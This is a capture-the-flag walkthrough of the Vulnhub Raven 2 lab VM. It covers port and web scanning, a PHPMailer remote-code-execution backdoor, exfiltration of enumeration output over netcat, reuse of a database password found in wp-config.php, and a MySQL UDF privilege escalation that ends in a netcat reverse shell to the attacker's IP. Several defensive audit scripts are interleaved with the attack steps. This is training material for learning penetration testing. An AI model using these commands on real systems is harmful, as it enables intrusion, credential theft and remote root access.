Hello comrade,
It's been a while since my last post. I've been a little busy because of the CTF challenge I'm organizing.
But enough excuses, little gopnik.

Today, a little training: Raven2 (from Vulnhub)


URL: https://www.vulnhub.com/entry/raven-2,269/

Description:
Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?



Setup

Following the KISS principle, I will export the target IP as an environment variable.

export IP=192.168.56.104

If you need a little memo about pentest tools, check mine at:
https://gitlab.com/AGS_321/pentest_wiki/wikis/home

Port Scanning

nmap -sC -sV -oA nmap_out_details_$(date +%Y-%m-%d:%H:%M:%S) $IP
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-27 14:10 CET
Nmap scan report for raven.local (192.168.56.104)
Host is up (0.00022s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          34127/tcp  status
|_  100024  1          52980/udp  status
MAC Address: 08:00:27:88:92:54 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.65 seconds

So what do I have here?

  • SSH service (22)
  • Web service (80)
  • RPC service (111)

Ok, let's start with the web service because, from my experience, it's the easiest place to find a starting point.

Web Service Exploration

nikto -h http://$IP/ -Format txt -output nikto_out_$(date +%Y-%m-%d:%H:%M:%S).txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        80
+ Start Time:         2019-02-27 14:25:05 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x41b3 0x5734482bdcb00
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ /wordpress/: A Wordpress installation was found.
+ 7535 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2019-02-27 14:25:35 (GMT1) (30 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Interesting points:

  • .DS_Store file
  • wordpress installation
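The header findings nikto reports above (missing X-Frame-Options / X-Content-Type-Options / X-XSS-Protection, the "leaks inodes via ETags" line) are the kind of thing a defender checks on every release. The script below is an added example written for this post, not nikto's own logic nor anything from the VM: it audits a captured set of response headers (a constructed sample built from the values the scan printed) and adds one caveat nikto does not make. nikto flags any hex ETag as an inode leak, but Apache 2.4's default `FileETag MTime Size` yields a two-component size-mtime tag (the `41b3-5734482bdcb00` seen above fits that shape); only the three-component `INode MTime Size` form actually exposes the inode.

```python
import re

# Constructed sample: what a defender would capture from GET / on the server
# fingerprinted above. Not a real capture from the VM.
OBSERVED_HEADERS = {
    "Server": "Apache/2.4.10 (Debian)",
    "ETag": '"41b3-5734482bdcb00"',      # size-mtime form (Apache 2.4 default)
    "Content-Type": "text/html",
}

# Same server after hardening (constructed).
HARDENED_HEADERS = {
    "Server": "Apache",                  # ServerTokens Prod
    "ETag": '"41b3-5734482bdcb00"',
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",
}

# Headers nikto flagged as missing, with the reason they matter.
REQUIRED_HEADERS = {
    "X-Frame-Options": "clickjacking protection",
    "X-Content-Type-Options": "stops MIME sniffing",
    "X-XSS-Protection": "legacy XSS filter hint",
}

# Apache builds the tag as inode-size-mtime when INode is in FileETag, and
# size-mtime under the 2.4 default. Two hex groups => no inode; three => inode first.
APACHE_ETAG_RE = re.compile(r'^(?:W/)?"([0-9a-f]+)-([0-9a-f]+)(?:-([0-9a-f]+))?"$')


def audit_headers(headers):
    """Return a list of human-readable findings for one response's headers."""
    findings = []
    lower = {k.lower(): v for k, v in headers.items()}

    for name, purpose in REQUIRED_HEADERS.items():
        if name.lower() not in lower:
            findings.append(f"missing {name} ({purpose})")

    etag = lower.get("etag")
    if etag:
        m = APACHE_ETAG_RE.match(etag)
        if m and m.group(3) is not None:
            # Three components: the first one is the inode number.
            findings.append(f"ETag leaks inode 0x{m.group(1)} (set FileETag MTime Size)")

    server = lower.get("server", "")
    if re.search(r"/\d", server):
        findings.append(f"Server header reveals version '{server}' (set ServerTokens Prod)")

    return findings


if __name__ == "__main__":
    for label, hdrs in (("observed", OBSERVED_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(f"[{label}]")
        for f in audit_headers(hdrs) or ["no findings"]:
            print("  -", f)
```

On the observed sample the script reports the three missing headers and the version-bearing Server banner, but not an inode leak; feed it an ETag with three components (an `INode MTime Size` server) and the inode finding appears.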

.DS_Store file

After a little bit of research, I found this tool to extract and download all files referenced by .DS_Store files.
https://github.com/lijiejie/ds_store_exp

But it's a dead end. Let's explore another lead.

Wordpress Installation

NB: On this kind of challenge it's generally better to add raven.local to /etc/hosts.

So let's scan this wordpress installation.

wpscan --url http://$IP/wordpress/ --wp-content-dir wordpress -e u
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.104/wordpress/
[+] Started: Wed Feb 27 15:42:30 2019

Interesting Finding(s):

[+] http://192.168.56.104/wordpress/
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.56.104/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.104/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
 | Detected By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.104/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.7'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.104/wordpress/, Match: 'WordPress 4.8.7'
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a

[i] The main theme could not be detected.

[+] Enumerating All Plugins

[i] No plugins Found.

[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:00 <=====================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.

[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:01 <====================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] michael
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] steven
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Finished: Wed Feb 27 15:59:52 2019
[+] Requests Done: 40
[+] Cached Requests: 4
[+] Data Sent: 8.471 KB
[+] Data Received: 677.562 KB
[+] Memory used: 9.996 MB
[+] Elapsed time: 00:00:07

So:

  • The WordPress installation is outdated
  • No config backup available
  • 2 users found (michael, steven)

I searched for WordPress exploits but found nothing really useful.

So let's go deeper with a directory enumeration.

dirb http://$IP /usr/share/dirb/wordlists/common.txt -o dirb_out_$(date +%Y-%m-%d:%H:%M:%S).txt

So here are only the interesting results:

==> DIRECTORY: http://192.168.56.104/css/
==> DIRECTORY: http://192.168.56.104/fonts/
==> DIRECTORY: http://192.168.56.104/img/
==> DIRECTORY: http://192.168.56.104/js/
==> DIRECTORY: http://192.168.56.104/manual/
==> DIRECTORY: http://192.168.56.104/vendor/
==> DIRECTORY: http://192.168.56.104/wordpress/

After some exploration it appears that the flag is in http://192.168.56.104/vendor/PATH/.

flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

It seems to be an MD5 hash, so let's crack it
with https://hashkiller.co.uk/Cracker/MD5

a2c1f66d2b8051bd3a5874b5b6e43e21 MD5 Raven2Flag1

[image: FirstBlood]

In this directory you can see some interesting files, such as PHPMailer.

[image: Directory_Listing_PhpMailer]

PhpMailer RCE

As we can see in the VERSION file, PHPMailer is outdated...
Let's see if any useful exploit exists.
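An exposed /vendor/ listing with a readable VERSION file is exactly what a defender's dependency inventory should catch before an attacker does. The script below is an added example written for this post (not the post's own tooling and not anything from the VM): it walks a vendor directory, recognises a PHPMailer checkout by the files it ships beside VERSION (an assumption used as the fingerprint here), and flags copies older than a minimum release. The threshold 5.2.18 is the version that fixed the well-known PHPMailer mail() argument-injection issue (CVE-2016-10033); the post does not name which advisory its exploit targets, so treat the minimum as a parameter to set from the advisory you care about. The version `5.2.16` in the demo is a constructed value, not read from the VM.

```python
import os
import re
import tempfile

# Files that mark a directory as a PHPMailer checkout (5.x and 6.x layouts).
# Assumption for this example; add markers for other libraries as needed.
PHPMAILER_MARKERS = ("class.phpmailer.php", os.path.join("src", "PHPMailer.php"))


def parse_version(text):
    """'5.2.16\\n' or 'v5.2.16' -> (5, 2, 16)."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_outdated(found, minimum):
    """True when found < minimum, component-wise, padding so that 5.2 == 5.2.0."""
    f, m = parse_version(found), parse_version(minimum)
    n = max(len(f), len(m))
    return f + (0,) * (n - len(f)) < m + (0,) * (n - len(m))


def find_phpmailer(vendor_dir):
    """Return {relative_dir: version_string} for every PHPMailer copy under vendor_dir."""
    hits = {}
    for dirpath, _dirs, files in os.walk(vendor_dir):
        if "VERSION" not in files:
            continue
        if not any(os.path.exists(os.path.join(dirpath, mk)) for mk in PHPMAILER_MARKERS):
            continue  # a VERSION file that belongs to some other library
        with open(os.path.join(dirpath, "VERSION")) as fh:
            hits[os.path.relpath(dirpath, vendor_dir)] = fh.read().strip()
    return hits


def outdated_phpmailer(vendor_dir, minimum="5.2.18"):
    """Subset of find_phpmailer() whose version is below `minimum`."""
    return {d: v for d, v in find_phpmailer(vendor_dir).items() if is_outdated(v, minimum)}


def demo():
    """Constructed vendor tree laid out like the VM's /vendor/ (VERSION beside class.phpmailer.php)."""
    with tempfile.TemporaryDirectory() as root:
        for name in ("class.phpmailer.php", "class.smtp.php"):
            open(os.path.join(root, name), "w").close()
        with open(os.path.join(root, "VERSION"), "w") as fh:
            fh.write("5.2.16\n")          # constructed value, not the VM's real file
        other = os.path.join(root, "other-lib")
        os.makedirs(other)
        with open(os.path.join(other, "VERSION"), "w") as fh:
            fh.write("1.0.0\n")           # no PHPMailer marker here, so it is ignored
        return outdated_phpmailer(root)


if __name__ == "__main__":
    for rel_dir, version in demo().items():
        print(f"outdated PHPMailer {version} in {rel_dir}")
```

Run it against a real `vendor/` checkout (or a web root, since `/vendor/` was served directly here) and wire the result into CI; the same walk generalises to any library that ships a VERSION file once you add its marker.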

[image: Exploit-DB_RCEPhpMailer]

So this exploit uses the PHP mail() function.
In my case the only compatible page is http://192.168.56.104/contact.php

After examining the code, I had to change a few things:
0- Specify UTF-8 encoding for the script
1- The target should point to http://192.168.56.104/contact.php
2- Set the local IP in the subprocess call to your IP
3- The location of the uploaded backdoor

NB: For point 3, the path can be deduced from the http://192.168.56.104/vendor/PATH/ file.

[image: Exploit_RCEPhpMailer_Modif]

Now let's set up a listener on the target machine
and run the backdoor by loading the page http://192.168.56.104/backdoor.php
And voila!

[image: WeGotShell]

Yes! A shell, that's where the fun begins!

[image: CatDancing_WeGoShell]

Now let's add some fun and spawn a TTY shell.

python -c 'import pty;pty.spawn("/bin/bash")'

And retrieve the flag

cd /var/www
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}

Once cracked

6a8ed560f0b5358ecf844108048eb337 MD5 Raven2Flag2

[image: MakeSomeNoiseFlag2]

Everything is more fun with a GIF.

Get a foothold

Now that we have user access on the target system, I must find a way to elevate my privileges.

So I will use the infamous LinEnum.sh

Step 1

On the attack machine

# Get the script from GitHub
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

# Run a web server in the directory holding LinEnum.sh so the target can fetch it
python -m SimpleHTTPServer 80

Step 2

On the target

wget http://192.168.56.103/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh > output

Step 3

On the attack machine

nc -l -p 1234 > output

On the target machine

nc -w 3 192.168.56.103 1234 < output

Step 4

Now I can examine results on my machine.

As wpscan showed, the WordPress user accounts match the system user accounts.

uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
uid=1001(steven) gid=1001(steven) groups=1001(steven)

But no more useful info.

Let's explore the full web directory.
As I saw before, the file name used for the flag is predictable.

find /var/www/html -name "*flag*"

/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
/var/www/html/wordpress/wp-includes/images/icon-pointer-flag-2x.png
/var/www/html/wordpress/wp-includes/images/icon-pointer-flag.png

And tada !!

[image: Flag3]

flag3{a0f568aa9de277887f37730d71520d9b}
a0f568aa9de277887f37730d71520d9b MD5 Raven2Flag3

[image: MakeSomeNoiseFlag3]

Just one more flag and a way to root left to find...
In my opinion, I can hit two targets with one bullet!

Escalate privilege with Mysql

One easy way to escalate privileges is to abuse a process running as root.
Let's take a look at the list of root processes from LinEnum's output.

[image: MySqlRunWithRootPriv]

So let's check the currently installed version.

dpkg -l |grep mysql

[image: MySQlVersion]

The latest version is MySQL 8.0.
Bingo!

[image: MysqlRootWhat]

Ok, let's explain this a little bit.

1- MySQL doesn't need to run as root in general
2- The MySQL password is in the WordPress configuration
3- The version is outdated
So if an exploit exists that uses the privileges of this process, I can be root!
Did you get it, little gopnik?


Step 1: Find a possible Exploit

[image: ExploitDB_Mysql]

A possible exploit is available at:

www.exploit-db.com/exploits/1518

Step 2: Let's retrieve the database password

find /var/www/html/wordpress -name "*config*"
/var/www/html/wordpress/wp-content/plugins/akismet/views/config.php
/var/www/html/wordpress/wp-admin/setup-config.php
/var/www/html/wordpress/wp-config.php
/var/www/html/wordpress/wp-config-sample.php

cat /var/www/html/wordpress/wp-config.php

[image: MySQlRootPass]

user: root
password: R@v3nSecurity

Step 3: Let's use the exploit

This exploit is a little bit tricky, so here I will just post the steps to make it run.
In the next article I will detail more how it works, so stay tuned!

Step 1: compile the .so

Since you can't compile the UDF library on the target machine, compile it on your attack machine.

Install all needed tools

apt install default-libmysqlclient-dev

Compile the shared object

gcc -Wall -I/usr/include/mysql -shared -o lib_mysqludf_sys.so lib_mysqludf_sys.c

If you get an error that "m_ctype.h" is not found, use the following compile command instead

gcc -Wall -I/usr/include/mysql/server -shared -o lib_mysqludf_sys.so lib_mysqludf_sys.c

Step 2: upload it to the target and set it up

wget -P /tmp 192.168.56.103/lib_mysqludf_sys.so
mysql -Dmysql -uroot -p'R@v3nSecurity'

create table improbable_upload(line blob);
insert into improbable_upload values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from improbable_upload into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';

create function sys_exec returns int soname 'lib_mysqludf_sys.so';

Step 3: Run a listener on the attack machine

nc -lnvp 4443

Step 4: Send yourself a shell

select sys_exec('nc 192.168.56.103 4443 -e /bin/bash');

And on the target machine you should see

[image: SendYourselfAShell]
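The three conditions listed earlier (mysqld running as root, the database root password sitting in wp-config.php, and a server that will happily write a UDF library into its plugin directory via INTO DUMPFILE) are each a configuration defect a defender can test for. The script below is an added example written for this post, not LinEnum's or the VM's code: it runs the checks over a constructed `ps` listing, a constructed `my.cnf` fragment and a constructed `wp-config.php` fragment, once for a weak setup shaped like the one found here and once for a hardened one. The option names (`user`, `secure_file_priv`) and the `[mysqld]` section are real MySQL/MariaDB configuration; the sample contents and the placeholder password are invented for the demo.

```python
import re

# Constructed `ps -eo user,pid,comm` output for the weak case: mysqld as root.
PS_WEAK = """\
USER       PID COMMAND
root         1 init
root       512 mysqld
www-data   700 apache2
"""

# Same listing after fixing the service user (constructed).
PS_OK = """\
USER       PID COMMAND
root         1 init
mysql      512 mysqld
www-data   700 apache2
"""

# Constructed my.cnf fragments. Weak: no user=, secure_file_priv left empty,
# which means LOAD_FILE()/INTO DUMPFILE may read and write any path mysqld can.
MYCNF_WEAK = """\
[mysqld]
datadir = /var/lib/mysql
secure_file_priv =
"""

MYCNF_OK = """\
[mysqld]
user = mysql
datadir = /var/lib/mysql
secure_file_priv = /var/lib/mysql-files   # file ops confined to this directory
"""

# Constructed wp-config.php fragments (placeholder password, not the VM's).
WPCONFIG_WEAK = """\
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'PLACEHOLDER_PASSWORD');
"""

WPCONFIG_OK = """\
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_app');
define('DB_PASSWORD', 'PLACEHOLDER_PASSWORD');
"""


def root_daemons(ps_text, names=("mysqld", "apache2", "nginx")):
    """Names from ps output that run as root although a service account would do."""
    found = []
    for line in ps_text.splitlines()[1:]:          # skip the USER PID COMMAND header
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "root" and parts[2] in names:
            found.append(parts[2])
    return found


def mysqld_options(cnf_text):
    """Parse the [mysqld] section of a my.cnf into {option: value}, ignoring comments."""
    opts, section = {}, None
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("["):
            section = line.strip("[]").strip()
            continue
        if section == "mysqld":
            key, _, val = line.partition("=")
            opts[key.strip().replace("-", "_")] = val.strip()
    return opts


def audit_mysql(ps_text, cnf_text, wpconfig_text):
    """Return a list of findings; an empty list means none of the three defects is present."""
    findings = []
    if "mysqld" in root_daemons(ps_text):
        findings.append("mysqld runs as root: any file mysqld writes (e.g. a UDF .so) is written as root")
    opts = mysqld_options(cnf_text)
    if opts.get("user") != "mysql":
        findings.append("no 'user = mysql' under [mysqld]: the daemon keeps whatever uid started it")
    if not opts.get("secure_file_priv"):
        findings.append("secure_file_priv unset or empty: LOAD_FILE/INTO DUMPFILE are not confined to a directory")
    m = re.search(r"define\(\s*'DB_USER'\s*,\s*'([^']*)'", wpconfig_text)
    if m and m.group(1) == "root":
        findings.append("WordPress connects as MySQL root: leaking wp-config.php hands over full DB administration")
    return findings


if __name__ == "__main__":
    print("weak:", *audit_mysql(PS_WEAK, MYCNF_WEAK, WPCONFIG_WEAK), sep="\n  ")
    print("hardened:", audit_mysql(PS_OK, MYCNF_OK, WPCONFIG_OK))
```

The weak set produces all four findings; the hardened set produces none. Running mysqld under its own account and setting `secure_file_priv` removes the root-owned file write that the UDF trick relies on, and a dedicated, least-privilege WordPress database user makes a leaked wp-config.php far less valuable.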

Get the last flag

[image: Flag4]

flag4{df2bc5e951d91581467bb9a2a8ff4425}
df2bc5e951d91581467bb9a2a8ff4425 MD5 Raven2Flag4

Social stuff / Questions / Comments

Feel free to reach out or tip me!

Mail: a_ghost_soul@protonmail.com
Twitter: @GhostAgs

If you appreciate my work, please consider making a donation
Tipeee: https://fr.tipeee.com/ags-syndrome